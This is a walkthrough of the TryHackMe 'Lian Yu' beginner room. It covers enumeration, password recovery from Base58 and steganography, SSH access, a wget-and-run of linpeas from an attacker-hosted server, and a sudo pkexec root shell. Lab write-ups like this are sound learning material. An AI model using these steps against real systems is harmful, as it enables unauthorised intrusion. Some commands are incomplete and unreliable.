Lian Yu - TryHackMe

Lian Yu is another beginner level challenge on TryHackMe. Below is a walkthrough to Find all the flags.

First, let’s run nmap with nmap -sC -sV -T4 [machine ip]

Lian Yu nmap

It appears that there is ftp, ssh, tcp, and rpc open. Let’s start by taking a look at the website in a web browser. It appears that this website is based on the DC comic book hero, Arrow.

Lian Yu website

Let’s use gobuster to enumerate the website with gobuster dir -u [machine ip] -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt. After a bit, an island subdirectory shows up.

Lian Yu gobuster

Let’s visit the page. It looks like there’s a code word, but it doesn’t appear to be there. Highlighting the entire page causes it to show up, however.

Lian Yu island page

Lian_Yu appears in bold, so let’s try both ftp and ssh as Lian_Yu with the code word we uncovered. Unfortunately, neither one was successful.

Lian Yu failed ssh and ftp

We will make note of this code word for later. Next, the hint for the first question states that the directory is in numbers. It also appears to be 4 digits in length. Let’s create a file that contains numbers from 0000 to 9999 with the following seq -w 9999 > pins.txt. This will create a text file (pins.txt) with this number range in it. Now let’s run gobuster dir -u http://[machine ip]/island -w pins.txt and see what shows up. It appears there is another subdirectory of 2100 underneath island. This is the answer to the first question.

Lian Yu gobuster 2100

There is a video on this page, but it appears to be a part of the first episode of the Arrow television series, which doesn’t seem to have any relevance to this challenge. When I look at the source of the page, however, there is a comment as shown below.

Lian Yu 2100 page source

The hint for this question mentions searching for a file by extension, maybe .ticket is the file extension? I navigated to the dirbuster wordlist with cd /usr/share/wordlists/dirbuster and ran pw-inspector -i directory-list-lowercase-2.3-medium.txt -m 11 - M 11 -o ~/arrow.txt. I knew the file was 11 characters in length before the potential extension of ticket based on the format of the answer in TryHackMe. I then used this as the wordlist in gobuster under the /island/2100 directory as follows gobuster dir -u http://[machine ip]/island/2100/ -w arrow.txt -x .ticket. Within a couple of moments it uncovers green_arrow.ticket.

Lian Yu green_arrow.ticket

Let’s navigate to that page. We are provided with a “token”. The hint states it appears to be base, so use cyberchef as recommended and you will eventually figure out it was encoded in Base58. This decoded is the ftp password, which is the answer to the 3rd question.

Lian Yu Base 58 decode

Let’s try logging in to the site via ftp, as we have the password. Remember the code word that we uncovered earlier? Let’s see if that’s the user.

Lian Yu FTP Access

Success! Let’s see what’s on this ftp site.

Lian Yu ftp directory listing

Let’s save all these pictures and see what they are with get Leave_me_alone.png, get Queen’s_Gambit.png, and get aa.jpg.

Lian Yu get files

Let’s type quit and then open up these images to see what’s in them. aa.jpg and Queen’s_Gambit.png open fine, but there is an error when attempting to open Leave_me_alone.png. .jpg files can be used in steganography, so let’s use stegcracker with stegcracker aa.jpg. After a few moments, it uncovers the password of password, and extracts the contents to aa.jpg.out.

Lian Yu stegcracker

Running file aa.jpg.out reveals that this is a zip file, let’s rename it to .zip with mv aa.jpg.out

Lian Yu change file to zip

Inside the zip files are two files, one is a 5 character name, which is the answer to the next question.

Lian Yu Open Zip File

The five letter file name includes the ssh password. However, we do not have a username and vigilante does not work this time around. Let’s reconnect as vigilante via ftp and type cd .. followed by ls to list all the user directories. There is another user directory present.

Lian Yu enumerate user folders via ftp

It appears that slade is another user. Let’s try logging in via ssh as slade with ssh slade@[machine ip] and utilize the password uncovered in the zip file earlier. Success, let’s run ls and a user.txt file is there. Let’s run cat user.txt to uncover the user flag.

Lian Yu ssh connection

Let’s use linpeas to enumerate this host for interesting files. First, let’s server up an http server on your attacking pc with python3 -m http.server

Lian Yu Python HTTP Server

Now, let’s navigate to the /tmp folder on our victim with cd /tmp since it’s typically a world writeable directory. Next, let’s use wget http://[attacker ip]:8000/ followed by chmod 777 and finally ./ to start enumerating our host. Unfortunately, this does not turn up much. Let’s run sudo -l and see what shows up.

Liam Yu sudo -l

Awesome, we can execute pkexec as sudo. Let’s run sudo /usr/bin/pkexec /bin/sh. Now we have a root shell.

Lian Yu Root Shell

Now let’s run cd /root, followed by ls, and then finally, cat root.txt to get the final flag.

Lian Yu Root Flag